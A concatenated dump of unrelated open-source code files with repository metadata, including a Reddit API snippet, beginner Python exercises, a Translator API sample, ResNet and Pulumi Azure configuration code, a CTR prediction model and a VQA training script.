MOESCAPE = "Moescape" # ANIME WALLPAPER ARTS
MAMARAIKOU = "MamaRaikou"
SABER = "Saber"
FGOCOMICS = "FGOcomics"
FATEPRISMAILLYA = "FatePrismaIllya"
ILLYASVIEL = "Illyasviel"
reddit = praw.Reddit(
client_id=os.environ['REDDIT_CLIENT_ID'],
client_secret=os.environ['REDDIT_CLIENT_SECRET'],
user_agent=os.environ['REDDIT_USER_AGENT']
)
submissions = list(reddit.subreddit(Subreddits.TSUNDERES).hot())
for submission in submissions:
# Post hint & url
print(submission.__dict__)
break
## print(submission.url,
## submission.is_self,
## submission.over_18,
## submission.stickied)
| [
"vngla21@gmail.com"
] | vngla21@gmail.com |
0c03f297ce168a7e9f0f9498333600c01a37b205 | 2c78b0b78f57dda018fe382a4ddda964eb3e68fd | /基础练习/jisuanji.py | f3732c06954f05def4711a8b00ef2dbfd787d19d | [] | no_license | Cola1995/s3 | 3a4621035928dcaa42c3117d25e88cf46a5f0721 | d5612d63dac415f861d379b20ba6a165faf213ae | refs/heads/master | 2020-04-13T14:14:38.753238 | 2019-03-22T01:36:46 | 2019-03-22T01:36:46 | 163,255,923 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,106 | py | import re
suan='1+(9+3*1-4+(1+4+(2+1*2+4/2)+(1+1))+(2*4))'
f=re.search('\([^()]*\)',suan).group()
print(f)
s='(2+1*2+1*3+3*3+9/3)'
s_t=''
if '*'or '/' in s:
for i in s:
if i=='*':
jie=int(s[s.index(i)-1])*int(s[s.index(i)+1])
s=s.replace(s[s.index(i)-1:s.index(i)+2],str(jie))
print(s)
elif i=='/':
jie1=int(s[s.index(i)-1])/int(s[s.index(i)+1])
s=s.replace(s[s.index(i)-1:s.index(i)+2],str(jie1))
print('体替换后的字符串是%s'%s)
else:
print("ssssss%s"%s)
index=s.count('+')+s.count('-')
for jj in range(index+1):
for i in s:
if i=='+':
sd=int(s[s.index(i)-1])+int(s[s.index(i)+1])
s=s.replace(s[s.index(i)-1:s.index(i)+2],str(sd))
print(s)
# else:
# for i in s_t:
# if i== '+':
# int_jg=int(s_t[s_t.index(i)-1])+int(s_t[s_t.index(i)+1])
# t_jia=s_t.replace(s_t[s_t.index(i)-1:s_t.index(i)+2],str(int_jg))
# print(t_jia)
| [
"991571566@qq.com"
] | 991571566@qq.com |
40f03b4a47d7607f7ead87b54fbca5de90f106d2 | 2bdedcda705f6dcf45a1e9a090377f892bcb58bb | /src/main/output/study/others_program.py | eaf139b4920f4137f30074773b3a1a6c7017c4b9 | [] | no_license | matkosoric/GenericNameTesting | 860a22af1098dda9ea9e24a1fc681bb728aa2d69 | 03f4a38229c28bc6d83258e5a84fce4b189d5f00 | refs/heads/master | 2021-01-08T22:35:20.022350 | 2020-02-21T11:28:21 | 2020-02-21T11:28:21 | 242,123,053 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,424 | py | const request = require('request');
const uuidv4 = require('uuid/v4');
/* Checks to see if the subscription key is available
as an environment variable. If you are setting your subscription key as a
string, then comment these lines out.
If you want to set your subscription key as a string, replace the value for
the Ocp-Apim-Subscription-Key header as a string. */
const subscriptionKey="9115e0519101697df35c8c7256d54256";
if (!subscriptionKey) {
throw new Error('Environment variable for your subscription key is not set.')
};
/* If you encounter any issues with the base_url or path, make sure that you are
using the latest endpoint: https://docs.microsoft.com/azure/cognitive-services/translator/reference/v3-0-translate */
function translateText(){
let options = {
method: 'POST',
baseUrl: 'https://api.cognitive.microsofttranslator.com/',
url: 'translate',
qs: {
'api-version': '3.0',
'to': ['']
},
headers: {
'38d63b3a15b77fa7883f764dd1732eae': subscriptionKey,
'Content-type': 'application/json',
'X-ClientTraceId': uuidv4().toString()
},
body: [{
'text': 'Hello World!'
}],
json: true,
};
request(options, function(err, res, body){
console.log(JSON.stringify(body, null, 4));
});
};
// Call the function to translate text.
translateText();
| [
"soric.matko@gmail.com"
] | soric.matko@gmail.com |
19338b9bbddbf1b84311569fecdfa9bf70ae8287 | d5552cda58e251e6a5983876681be8f641dea86f | /src/transformers/models/resnet/configuration_resnet.py | 2d0dbc3b0fdb409f4150d985484321766f1fcd44 | [
"Apache-2.0"
] | permissive | patrickvonplaten/transformers | feb121e1ee82c317ac7561836b8f95a7de25fc1f | f738502979f6787609dcf0180e6606f464692e27 | refs/heads/master | 2022-12-08T10:15:34.743198 | 2022-11-22T11:00:20 | 2022-11-22T11:00:20 | 226,201,271 | 6 | 1 | Apache-2.0 | 2019-12-05T22:39:46 | 2019-12-05T22:39:45 | null | UTF-8 | Python | false | false | 5,262 | py | # coding=utf-8
# Copyright 2022 Microsoft Research, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" ResNet model configuration"""
from collections import OrderedDict
from typing import Mapping
from packaging import version
from ...configuration_utils import PretrainedConfig
from ...onnx import OnnxConfig
from ...utils import logging
logger = logging.get_logger(__name__)
RESNET_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"microsoft/resnet-50": "https://huggingface.co/microsoft/resnet-50/blob/main/config.json",
}
class ResNetConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`ResNetModel`]. It is used to instantiate an
ResNet model according to the specified arguments, defining the model architecture. Instantiating a configuration
with the defaults will yield a similar configuration to that of the ResNet
[microsoft/resnet-50](https://huggingface.co/microsoft/resnet-50) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
num_channels (`int`, *optional*, defaults to 3):
The number of input channels.
embedding_size (`int`, *optional*, defaults to 64):
Dimensionality (hidden size) for the embedding layer.
hidden_sizes (`List[int]`, *optional*, defaults to `[256, 512, 1024, 2048]`):
Dimensionality (hidden size) at each stage.
depths (`List[int]`, *optional*, defaults to `[3, 4, 6, 3]`):
Depth (number of layers) for each stage.
layer_type (`str`, *optional*, defaults to `"bottleneck"`):
The layer to use, it can be either `"basic"` (used for smaller models, like resnet-18 or resnet-34) or
`"bottleneck"` (used for larger models like resnet-50 and above).
hidden_act (`str`, *optional*, defaults to `"relu"`):
The non-linear activation function in each block. If string, `"gelu"`, `"relu"`, `"selu"` and `"gelu_new"`
are supported.
downsample_in_first_stage (`bool`, *optional*, defaults to `False`):
If `True`, the first stage will downsample the inputs using a `stride` of 2.
out_features (`List[str]`, *optional*):
If used as backbone, list of features to output. Can be any of `"stem"`, `"stage1"`, `"stage2"`,
`"stage3"`, `"stage4"`.
Example:
```python
>>> from transformers import ResNetConfig, ResNetModel
>>> # Initializing a ResNet resnet-50 style configuration
>>> configuration = ResNetConfig()
>>> # Initializing a model (with random weights) from the resnet-50 style configuration
>>> model = ResNetModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```
"""
model_type = "resnet"
layer_types = ["basic", "bottleneck"]
def __init__(
self,
num_channels=3,
embedding_size=64,
hidden_sizes=[256, 512, 1024, 2048],
depths=[3, 4, 6, 3],
layer_type="bottleneck",
hidden_act="relu",
downsample_in_first_stage=False,
out_features=None,
**kwargs
):
super().__init__(**kwargs)
if layer_type not in self.layer_types:
raise ValueError(f"layer_type={layer_type} is not one of {','.join(self.layer_types)}")
self.num_channels = num_channels
self.embedding_size = embedding_size
self.hidden_sizes = hidden_sizes
self.depths = depths
self.layer_type = layer_type
self.hidden_act = hidden_act
self.downsample_in_first_stage = downsample_in_first_stage
self.stage_names = ["stem"] + [f"stage{idx}" for idx in range(1, len(depths) + 1)]
if out_features is not None:
if not isinstance(out_features, list):
raise ValueError("out_features should be a list")
for feature in out_features:
if feature not in self.stage_names:
raise ValueError(
f"Feature {feature} is not a valid feature name. Valid names are {self.stage_names}"
)
self.out_features = out_features
class ResNetOnnxConfig(OnnxConfig):
torch_onnx_minimum_version = version.parse("1.11")
@property
def inputs(self) -> Mapping[str, Mapping[int, str]]:
return OrderedDict(
[
("pixel_values", {0: "batch", 1: "num_channels", 2: "height", 3: "width"}),
]
)
@property
def atol_for_validation(self) -> float:
return 1e-3
| [
"noreply@github.com"
] | patrickvonplaten.noreply@github.com |
d64428aa8ab4edc892e4df136959e62393a5edc2 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/datashare/v20201001preview/get_blob_data_set.py | 79ae160c76b7217e3429731faca4a1ab166ad90b | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 7,209 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetBlobDataSetResult',
'AwaitableGetBlobDataSetResult',
'get_blob_data_set',
]
@pulumi.output_type
class GetBlobDataSetResult:
"""
An Azure storage blob data set.
"""
def __init__(__self__, container_name=None, data_set_id=None, file_path=None, id=None, kind=None, name=None, resource_group=None, storage_account_name=None, subscription_id=None, system_data=None, type=None):
if container_name and not isinstance(container_name, str):
raise TypeError("Expected argument 'container_name' to be a str")
pulumi.set(__self__, "container_name", container_name)
if data_set_id and not isinstance(data_set_id, str):
raise TypeError("Expected argument 'data_set_id' to be a str")
pulumi.set(__self__, "data_set_id", data_set_id)
if file_path and not isinstance(file_path, str):
raise TypeError("Expected argument 'file_path' to be a str")
pulumi.set(__self__, "file_path", file_path)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if resource_group and not isinstance(resource_group, str):
raise TypeError("Expected argument 'resource_group' to be a str")
pulumi.set(__self__, "resource_group", resource_group)
if storage_account_name and not isinstance(storage_account_name, str):
raise TypeError("Expected argument 'storage_account_name' to be a str")
pulumi.set(__self__, "storage_account_name", storage_account_name)
if subscription_id and not isinstance(subscription_id, str):
raise TypeError("Expected argument 'subscription_id' to be a str")
pulumi.set(__self__, "subscription_id", subscription_id)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="containerName")
def container_name(self) -> str:
"""
Container that has the file path.
"""
return pulumi.get(self, "container_name")
@property
@pulumi.getter(name="dataSetId")
def data_set_id(self) -> str:
"""
Unique id for identifying a data set resource
"""
return pulumi.get(self, "data_set_id")
@property
@pulumi.getter(name="filePath")
def file_path(self) -> str:
"""
File path within the source data set
"""
return pulumi.get(self, "file_path")
@property
@pulumi.getter
def id(self) -> str:
"""
The resource id of the azure resource
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> str:
"""
Kind of data set.
Expected value is 'Blob'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the azure resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroup")
def resource_group(self) -> str:
"""
Resource group of storage account
"""
return pulumi.get(self, "resource_group")
@property
@pulumi.getter(name="storageAccountName")
def storage_account_name(self) -> str:
"""
Storage account name of the source data set
"""
return pulumi.get(self, "storage_account_name")
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> str:
"""
Subscription id of storage account
"""
return pulumi.get(self, "subscription_id")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
System Data of the Azure resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of the azure resource
"""
return pulumi.get(self, "type")
class AwaitableGetBlobDataSetResult(GetBlobDataSetResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetBlobDataSetResult(
container_name=self.container_name,
data_set_id=self.data_set_id,
file_path=self.file_path,
id=self.id,
kind=self.kind,
name=self.name,
resource_group=self.resource_group,
storage_account_name=self.storage_account_name,
subscription_id=self.subscription_id,
system_data=self.system_data,
type=self.type)
def get_blob_data_set(account_name: Optional[str] = None,
data_set_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
share_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetBlobDataSetResult:
"""
An Azure storage blob data set.
:param str account_name: The name of the share account.
:param str data_set_name: The name of the dataSet.
:param str resource_group_name: The resource group name.
:param str share_name: The name of the share.
"""
__args__ = dict()
__args__['accountName'] = account_name
__args__['dataSetName'] = data_set_name
__args__['resourceGroupName'] = resource_group_name
__args__['shareName'] = share_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:datashare/v20201001preview:getBlobDataSet', __args__, opts=opts, typ=GetBlobDataSetResult).value
return AwaitableGetBlobDataSetResult(
container_name=__ret__.container_name,
data_set_id=__ret__.data_set_id,
file_path=__ret__.file_path,
id=__ret__.id,
kind=__ret__.kind,
name=__ret__.name,
resource_group=__ret__.resource_group,
storage_account_name=__ret__.storage_account_name,
subscription_id=__ret__.subscription_id,
system_data=__ret__.system_data,
type=__ret__.type)
| [
"noreply@github.com"
] | morrell.noreply@github.com |
567fe246643d90abf4f7c5c8def3e5303b8e0179 | 76aa894988b3123306030240512c1e5039b2bc75 | /scripts/0123456789abcdef/scripts/test.py | a00e67ecd316ddd7fcd81238dbdad019b22636b8 | [] | no_license | puppycodes/powny | 4c2a554ed63c2f3a80a77ccefb491d00f951d877 | a5f20ff667c2f93b72b63865f70e25b26e6d4b30 | refs/heads/master | 2021-01-23T06:29:19.506593 | 2016-06-07T16:26:48 | 2016-06-07T16:26:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | import urllib.request
from powny.core import (
expose,
save_job_state,
get_cas_storage,
)
# =====
@expose
def empty_method(**event):
pass
@expose
def do_urlopen(url, **_):
for _ in range(3):
urllib.request.build_opener().open(url)
save_job_state()
@expose
def failed_once(url):
save_job_state()
do_fail = get_cas_storage().replace_value(
path="failed_once_value",
value=False,
default=True,
)[0].value
if do_fail:
raise RuntimeError("A-HA-HA ANARCHY!!!111")
save_job_state()
urllib.request.build_opener().open(url)
return "OK"
| [
"mdevaev@gmail.com"
] | mdevaev@gmail.com |
e25ef155d81ca596891f43af8a1402d173ee151a | 3d705ec48c94373817e5f61d3f839988910431e3 | /lib/platform/dataprocess/spark_compute/makedata/peer_info.py | 3f6afbe05e41f38830ab26399afc5b95bae3bef5 | [] | no_license | namesuqi/zeus | 937d3a6849523ae931162cd02c5a09b7e37ebdd8 | 3445b59b29854b70f25da2950016f135aa2a5204 | refs/heads/master | 2022-07-24T14:42:28.600288 | 2018-03-29T08:03:09 | 2018-03-29T08:03:09 | 127,256,973 | 0 | 0 | null | 2022-07-07T22:57:57 | 2018-03-29T07:53:16 | Python | UTF-8 | Python | false | false | 3,470 | py | from lib.platform.dataprocess.spark_compute.test_data import *
from lib.platform.dataprocess.spark_compute.commontool.timestamp_conversion import *
import random
import os
class PeerInfo(object):
def make_data(self, hour=''):
data_format = '%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\x1f%s\n'
with open(os.path.abspath(os.path.dirname(__file__)) + '/peer_info.txt', 'w') as writer:
if hour == '':
for hour in range(24):
for minute in range(60):
topic = 'topic=' + 'peer_info'
id = "id=" + test_file_id[random.randint(0, len(test_file_id) - 1)] + ":" + str(
random.randint(1000, 1000000))
timestamp = 'timestamp=' + str(
TimestampConversion.get_timestamp(test_day + '%02d' % hour + '%02d' % minute))
input_time = 'input_time=' + str(long(timestamp.split('=')[1]) + 300)
output_time = 'output_time=' + str(long(timestamp.split('=')[1]) + 600)
peer_id = 'peer_id=' + test_peer_id[random.randint(0, len(test_peer_id) - 1)]
sdk_version = 'sdk_version=' + test_sdk_version[random.randint(0, len(test_sdk_version) - 1)]
nat_type = 'nat_type=' + str(random.randint(1, 4))
public_ip = 'public_ip=' + '10.5.100.1'
public_port = 'public_port=' + '8888'
private_ip = 'private_ip=' + '192.168.1.110'
private_port = 'private_port=' + '8080'
macs = 'macs=' + '9C-5C-8E-87-6A-25'
writer.write(data_format % (topic, id, timestamp, input_time, output_time, peer_id, sdk_version,
nat_type, public_ip, public_port, private_ip, private_port, macs))
else:
for minute in range(60):
topic = 'topic=' + 'peer_info'
id = "id=" + test_file_id[random.randint(0, len(test_file_id) - 1)] + ":" + str(
random.randint(1000, 1000000))
timestamp = 'timestamp=' + str(
TimestampConversion.get_timestamp("20160823" + '{:0>2}'.format(hour) + '%02d' % minute))
input_time = 'input_time=' + str(long(timestamp.split('=')[1]) + 300)
output_time = 'output_time=' + str(long(timestamp.split('=')[1]) + 600)
peer_id = 'peer_id=' + test_peer_id[random.randint(0, len(test_peer_id) - 1)]
sdk_version = 'sdk_version=' + test_sdk_version[random.randint(0, len(test_sdk_version) - 1)]
nat_type = 'nat_type=' + str(random.randint(1, 4))
public_ip = 'public_ip=' + '10.5.100.1'
public_port = 'public_port=' + '8888'
private_ip = 'private_ip=' + '192.168.1.110'
private_port = 'private_port=' + '8080'
macs = 'macs=' + '9C-5C-8E-87-6A-25'
writer.write(data_format % (topic, id, timestamp, input_time, output_time, peer_id, sdk_version,
nat_type, public_ip, public_port, private_ip, private_port, macs))
if __name__ == '__main__':
pi = PeerInfo()
pi.make_data('6')
| [
"suqi_name@163.com"
] | suqi_name@163.com |
124b6b6f688fe6ce26cff3df5a495cc90d430f4d | 556403cb93b2fdd464c3aef4cba4f1c3dc42e9d7 | /Python/ForLoop.py | 4e886ca3f9f96d620db34733d62e1450effea765 | [] | no_license | msivakumarm/PycharmProjects | 4d90a0105f334f2393d30fe46dc650808002b4fd | 7d84194a576f9ec8356ff272642d07dbddc48d42 | refs/heads/master | 2020-09-06T14:42:12.945424 | 2019-11-08T11:42:14 | 2019-11-08T11:42:14 | 219,989,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | #print 0 to 9 numbers
for i in range(10): #bydefault starting value is 0
print(i) # 0 1 2 3 4 5 6 7 8 9
#print 1 to 10
for i in range(1,11):
print(i)
#print even numbers
for i in range(2,10,2): #initial value , max value , increment/decrement
print(i) # 2,4 ,6 ,8
#print odd numbers
for i in range(1,10,2): #initial value , max value , increment/decrement
print(i) # 1,3,5,7,9
#print 10 to 1 (descending order)
for i in range(10,1,-1):
print(i) # 10,9,8,7,6,5,4,3,2
fruits=['apple','banana','grape']
for val in fruits:
print(val)
else:
print("no fruits left") | [
"sivakumarm.mamillapalli@gmail.com"
] | sivakumarm.mamillapalli@gmail.com |
8b9167feeea3cb86a5059b7693f5777d6917802b | 8ed80561e1b3c0bcdb6201cae8af845d5da23edc | /guppe/exercicios_secao_4/ex_52.py | 03b73be3042b8d029004922244ad7e3f88b9bf58 | [] | no_license | Fulvio7/curso-python-guppe | 42d5a1ecd80c1f3b27dc3f5dad074a51c9b774eb | 98966963f698eb33e65ed58a84f96e28f675848a | refs/heads/main | 2023-08-28T13:31:12.916407 | 2021-10-09T19:03:17 | 2021-10-09T19:03:17 | 415,393,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | """
52- Três amigos jogaram na loteria. Caso eles ganhem, o prêmio deve
ser repartido proporcionalmente ao valor que cada um deu para a
realização da aposta. Faça um programa que leia quanto cada um investiu,
o valor do prêmio, e imprima quanto cada um ganharia do prêmio com base
no valor investido.
"""
print('===== LOTERIA DAORA =====')
premio_total = float(input('Digite o valor do prêmio: R$ '))
print('Digite o valor investido por cada apostador:')
aposta_jogador_1 = float(input('Jogador 1: R$ '))
aposta_jogador_2 = float(input('Jogador 2: R$ '))
aposta_jogador_3 = float(input('Jogador 3: R$ '))
total_apostado = aposta_jogador_1 + aposta_jogador_2 + aposta_jogador_3
premio_jogador_1 = (aposta_jogador_1 / total_apostado) * premio_total
premio_jogador_2 = (aposta_jogador_2 / total_apostado) * premio_total
premio_jogador_3 = (aposta_jogador_3 / total_apostado) * premio_total
print('Caso vocês ganhem, o resultado é o seguinte: ')
print(f'Prêmio jogador 1: R$ {premio_jogador_1:.2f}')
print(f'Prêmio jogador 2: R$ {premio_jogador_2:.2f}')
print(f'Prêmio jogador 3: R$ {premio_jogador_3:.2f}')
| [
"fulvio.barichello@gmail.com"
] | fulvio.barichello@gmail.com |
21131ff81ef9cdc75d8619c4d34ef8e46db5e505 | e000db56febfc79ee1586804265d11fca4adfe59 | /venv/Session10C.py | a2e284ab8113fcbc461a2760a8314be4f2161fd1 | [] | no_license | ishantk/PythonSep72018 | 2210bb1747752309eb5ef431988e2197e393cf2d | 5413c0061dd644166eeb3539d75b7404c6ea12d9 | refs/heads/master | 2020-03-28T06:11:41.991398 | 2018-11-19T12:08:55 | 2018-11-19T12:08:55 | 147,819,901 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | # import Session10B
# from Session10B import Employee
from Session10B import executeCode as ec
from Session10B import Employee as Emp
e = Emp()
print(e.sayHello())
# executeCode()
print("------")
ec()
print(e)
# print(e.__str__())
# print(e.__repr__()) | [
"er.ishant@gmail.com"
] | er.ishant@gmail.com |
0883e9291c134db423f5c47f4e0a3a398efa6b87 | eccbb87eefe632a1aa4eafb1e5581420ccf2224a | /July-kaggle/avazu-ctr-prediction/model_bak.py | 2002edbf0f47c4ffe558c3a8a29057ba79a16674 | [] | no_license | jianjunyue/python-learn-ml | 4191fc675d79830308fd06a62f16a23295a48d32 | 195df28b0b8b8b7dc78c57dd1a6a4505e48e499f | refs/heads/master | 2018-11-09T15:31:50.360084 | 2018-08-25T07:47:20 | 2018-08-25T07:47:20 | 102,184,768 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,404 | py | import numpy as np
import pandas as pd
# data precession
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import KFold
# model
from xgboost import XGBRegressor
# from lightgbm import LGBMRegressor
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, AdaBoostRegressor
from sklearn.linear_model import LinearRegression
from sklearn.tree import DecisionTreeRegressor
# Initial setup
train_filename = "../../../data/avazu-ctr-prediction/train_small.csv"
test_filename = "../../../data/avazu-ctr-prediction/test"
submission_filename = "../../../data/avazu-ctr-prediction/sampleSubmission"
train_df = pd.read_csv(train_filename)
test_df = pd.read_csv(test_filename)
tcolumns="year,month,day,hours,C1,banner_pos,site_id,site_domain,site_category,app_id,app_domain,app_category,device_model,device_type,device_conn_type,C14,C15,C16,C17,C18,C19,C20,C21".split(",")
def get_data(data):
hour =data["hour"]
data["hours"]=(hour%100).astype(np.uint32)
hour=hour//100
data["day"]=(hour%100).astype(np.uint32)
hour = hour // 100
data["month"]=(hour%100).astype(np.uint32)
hour = hour // 100
data["year"]=(hour%100).astype(np.uint32)
for c in tcolumns:
if data[c].dtype=="object":
lbl = LabelEncoder()
lbl.fit(list(data[c].values))
data[c] = lbl.transform(list(data[c].values))
return data
train_df= get_data(train_df)
test_df= get_data(test_df)
x_train=train_df[tcolumns]
y_train=train_df[["click"]]
x_test=test_df[tcolumns]
# print(test_df['id'].astype(np.uint64))
#模型融合
class Ensemble(object):
def __init__(self, n_splits, stacker, base_models):
self.n_splits = n_splits
self.stacker = stacker
self.base_models = base_models
def fit_predict(self, X, y, T):
X = np.array(X)
y = np.array(y)
T = np.array(T)
folds = list(KFold(n_splits=self.n_splits, shuffle=True, random_state=2016).split(X, y))
S_train = np.zeros((X.shape[0], len(self.base_models)))
S_test = np.zeros((T.shape[0], len(self.base_models)))
for i, clf in enumerate(self.base_models):
S_test_i = np.zeros((T.shape[0], self.n_splits))
for j, (train_idx, test_idx) in enumerate(folds):
X_train = X[train_idx]
y_train = y[train_idx]
X_holdout = X[test_idx]
y_holdout = y[test_idx]
print("Fit Model %d fold %d" % (i, j))
clf.fit(X_train, y_train)
y_pred = clf.predict(X_holdout)[:]
S_train[test_idx, i] = y_pred
S_test_i[:, j] = clf.predict(T)[:]
S_test[:, i] = S_test_i.mean(axis=1)
# results = cross_val_score(self.stacker, S_train, y, cv=5, scoring='r2')
# print("Stacker score: %.4f (%.4f)" % (results.mean(), results.std()))
# exit()
self.stacker.fit(S_train, y)
res = self.stacker.predict(S_test)[:]
return res
# rf params
rf_params = {}
rf_params['n_estimators'] = 32
rf_params['max_depth'] = 8
rf_params['min_samples_split'] = 100
rf_params['min_samples_leaf'] = 30
# xgb params
xgb_params = {}
# xgb_params['n_estimators'] = 50
xgb_params['min_child_weight'] = 12
xgb_params['learning_rate'] = 0.37
xgb_params['max_depth'] = 6
xgb_params['subsample'] = 0.77
xgb_params['reg_lambda'] = 0.8
xgb_params['reg_alpha'] = 0.4
xgb_params['base_score'] = 0
# xgb_params['seed'] = 400
xgb_params['silent'] = 1
# RF model
rf_model = RandomForestRegressor(**rf_params)
# XGB model
xgb_model = XGBRegressor(**xgb_params)
stack = Ensemble(n_splits=3,
stacker=LinearRegression(),
base_models=(xgb_model,rf_model))
y_test = stack.fit_predict(x_train, y_train, x_test)
# 按照指定的格式生成结果
def create_submission(ids, predictions, filename=submission_filename):
# submission_df = pd.DataFrame({"id": ids, "click": predictions})
submission_df = pd.DataFrame(data={'aid' : ids, 'click': predictions})
print(submission_df.head())
# submission_df.to_csv(submission_filename+"_sub", header=['id', 'click'], index=False)
submission_df.to_csv(submission_filename + "_sub",index=False)
pre_df=pd.DataFrame(y_test,columns=["click"])
create_submission(test_df['id'].astype(np.uint64), pre_df["click"]) | [
"409494312@qq.com"
] | 409494312@qq.com |
55b52bf6e5b94c9f78ec06e048d71bd52b96f552 | d1aa7e50a50e6a3e44749644d164e19a6f8485f7 | /UpDn_vqa/train.py | 5afd5848bfd1d604f3b37fae3f4ca81d92b932fa | [] | no_license | qwjaskzxl/VQA | 12461f30780893ff8514bb6a17fcef1aba5ae224 | 705edeb0b80a7e301add2268d87470a02f3ab258 | refs/heads/master | 2020-12-10T13:07:19.112014 | 2020-03-03T12:20:02 | 2020-03-03T12:20:02 | 233,603,008 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,752 | py | import os
import time
import torch
import torch.nn as nn
import utils
from torch.autograd import Variable
def instance_bce_with_logits(logits, labels):
assert logits.dim() == 2
loss = nn.functional.binary_cross_entropy_with_logits(logits, labels)
loss *= labels.size(1)
return loss
def compute_score_with_logits(logits, labels):
logits = torch.max(logits, 1)[1].data # argmax
one_hots = torch.zeros(*labels.size()).cuda()
one_hots.scatter_(1, logits.view(-1, 1), 1)
scores = (one_hots * labels)
return scores
def train(model, train_loader, eval_loader, num_epochs, output):
utils.create_dir(output)
optim = torch.optim.Adamax(model.parameters())
logger = utils.Logger(os.path.join(output, 'log.txt'))
best_eval_score = 0
for epoch in range(num_epochs):
total_loss = 0
train_score = 0
t = time.time()
for i, (v, b, q, a) in enumerate(train_loader):
v = Variable(v).cuda()
b = Variable(b).cuda()
q = Variable(q).cuda()
a = Variable(a).cuda()
pred = model(v, b, q, a)
loss = instance_bce_with_logits(pred, a)
loss.backward()
nn.utils.clip_grad_norm(model.parameters(), 0.25)
optim.step()
optim.zero_grad()
batch_score = compute_score_with_logits(pred, a.data).sum()
total_loss += loss.item() * v.size(0)
train_score += batch_score
total_loss /= len(train_loader.dataset)
train_score = 100 * train_score / len(train_loader.dataset)
model.train(False)
eval_score, bound = evaluate(model, eval_loader)
model.train(True)
logger.write('epoch %d, time: %.2f' % (epoch, time.time()-t))
logger.write('\ttrain_loss: %.2f, score: %.2f' % (total_loss, train_score))
logger.write('\teval score: %.2f (%.2f)' % (100 * eval_score, 100 * bound))
if eval_score > best_eval_score:
model_path = os.path.join(output, 'model.pth')
torch.save(model.state_dict(), model_path)
best_eval_score = eval_score
def evaluate(model, dataloader):
score = 0
upper_bound = 0
num_data = 0
for v, b, q, a in iter(dataloader):
v = Variable(v, volatile=True).cuda()
b = Variable(b, volatile=True).cuda()
q = Variable(q, volatile=True).cuda()
pred = model(v, b, q, None)
batch_score = compute_score_with_logits(pred, a.cuda()).sum()
score += batch_score
upper_bound += (a.max(1)[0]).sum()
num_data += pred.size(0)
score = score / len(dataloader.dataset)
upper_bound = upper_bound / len(dataloader.dataset)
return score, upper_bound
| [
"870384605@qq.com"
] | 870384605@qq.com |
